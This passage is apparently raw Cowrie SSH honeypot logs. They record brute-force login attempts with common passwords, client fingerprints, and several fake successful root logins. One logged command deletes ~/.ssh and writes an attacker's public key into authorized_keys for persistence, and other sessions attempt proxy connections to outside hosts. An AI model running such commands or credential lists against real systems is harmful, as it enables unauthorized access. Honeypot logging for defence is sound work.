message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:08:57.002082Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"qwer1234","message":"login attempt [mysql/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:08:57.592594Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql@1234","message":"login attempt [mysql/mysql@1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:08:58.721672Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-26T14:08:59.851642Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"abc123","message":"login attempt [mysql/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:09:00.981617Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"abcd123","message":"login attempt [mysql/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:09:02.112085Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:09:03.242842Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39228,"dst_ip":"1.2.3.4","dst_port":22,"session":"252d0129ad97","protocol":"ssh","message":"New connection: 212.227.235.229:39228 (1.2.3.4:22) [session: 252d0129ad97]","sensor":"my-vps","timestamp":"2025-08-26T14:09:10.709137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:09:10.709964Z","src_ip":"212.227.235.229","session":"252d0129ad97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:09:10.950649Z","src_ip":"212.227.235.229","session":"252d0129ad97"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"d3pl0y1234","message":"login attempt [deploy/d3pl0y1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:09:11.962199Z","src_ip":"212.227.235.229","session":"252d0129ad97"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:09:13.206340Z","src_ip":"212.227.235.229","session":"252d0129ad97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58656,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3ed66b407c4","protocol":"ssh","message":"New connection: 212.227.125.160:58656 (1.2.3.4:22) [session: d3ed66b407c4]","sensor":"my-vps","timestamp":"2025-08-26T14:09:20.774990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:09:20.971268Z","src_ip":"212.227.125.160","session":"d3ed66b407c4"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":49130,"dst_ip":"1.2.3.4","dst_port":22,"session":"d25c6759947f","protocol":"ssh","message":"New connection: 45.88.8.186:49130 (1.2.3.4:22) [session: d25c6759947f]","sensor":"my-vps","timestamp":"2025-08-26T14:09:22.013232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:09:22.935829Z","src_ip":"45.88.8.186","session":"d25c6759947f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:09:22.936506Z","src_ip":"45.88.8.186","session":"d25c6759947f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:09:24.215698Z","src_ip":"212.227.125.160","session":"d3ed66b407c4"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:09:25.648946Z","src_ip":"212.227.125.160","session":"d3ed66b407c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Surya@123","message":"login attempt [root/Surya@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:09:25.874203Z","src_ip":"45.88.8.186","session":"d25c6759947f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T14:09:25.901664Z","session":"d3ed66b407c4"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:09:26.456797Z","src_ip":"45.88.8.186","session":"d25c6759947f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:09:26.740669Z","src_ip":"212.227.125.160","session":"d3ed66b407c4"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:09:27.231722Z","src_ip":"212.227.125.160","session":"d3ed66b407c4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60416,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f4363270f57","protocol":"ssh","message":"New connection: 217.72.205.35:60416 (1.2.3.4:22) [session: 8f4363270f57]","sensor":"my-vps","timestamp":"2025-08-26T14:09:52.970512Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:09:52.971720Z","src_ip":"217.72.205.35","session":"8f4363270f57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11053,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e0fa4938d8a","protocol":"ssh","message":"New connection: 212.227.235.229:11053 (1.2.3.4:22) [session: 3e0fa4938d8a]","sensor":"my-vps","timestamp":"2025-08-26T14:10:10.707398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:10:10.708862Z","src_ip":"212.227.235.229","session":"3e0fa4938d8a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:10:10.840678Z","src_ip":"212.227.235.229","session":"3e0fa4938d8a"}
{"eventid":"cowrie.login.success","username":"root","password":"redhat123","message":"login attempt [root/redhat123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:10:11.433674Z","src_ip":"212.227.235.229","session":"3e0fa4938d8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T14:10:11.562621Z","session":"3e0fa4938d8a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T14:10:11.693604Z","src_ip":"212.227.235.229","session":"3e0fa4938d8a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:11.821644Z","src_ip":"212.227.235.229","session":"3e0fa4938d8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43990,"dst_ip":"1.2.3.4","dst_port":22,"session":"33aacacb80d5","protocol":"ssh","message":"New connection: 212.227.235.229:43990 (1.2.3.4:22) [session: 33aacacb80d5]","sensor":"my-vps","timestamp":"2025-08-26T14:10:21.477494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:10:21.478847Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:10:21.693546Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Hello@1234","message":"login attempt [root/Hello@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:10:22.647810Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:10:23.115915Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:10:23.116717Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:10:23.117790Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:23.338453Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:10:23.879821Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:10:23.880635Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:10:24.111085Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:24.112106Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41626,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fdce2d6d3f6","protocol":"ssh","message":"New connection: 212.227.235.229:41626 (1.2.3.4:22) [session: 1fdce2d6d3f6]","sensor":"my-vps","timestamp":"2025-08-26T14:10:24.327373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:10:24.328470Z","src_ip":"212.227.235.229","session":"1fdce2d6d3f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:10:24.544257Z","src_ip":"212.227.235.229","session":"1fdce2d6d3f6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:25.441830Z","src_ip":"212.227.235.229","session":"1fdce2d6d3f6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:26.661815Z","src_ip":"212.227.235.229","session":"1fdce2d6d3f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41630,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b14174dd09f","protocol":"ssh","message":"New connection: 212.227.235.229:41630 (1.2.3.4:22) [session: 8b14174dd09f]","sensor":"my-vps","timestamp":"2025-08-26T14:10:26.895123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:10:26.896159Z","src_ip":"212.227.235.229","session":"8b14174dd09f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:10:27.130739Z","src_ip":"212.227.235.229","session":"8b14174dd09f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:10:28.054031Z","src_ip":"212.227.235.229","session":"8b14174dd09f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:28.262993Z","src_ip":"212.227.235.229","session":"8b14174dd09f"}
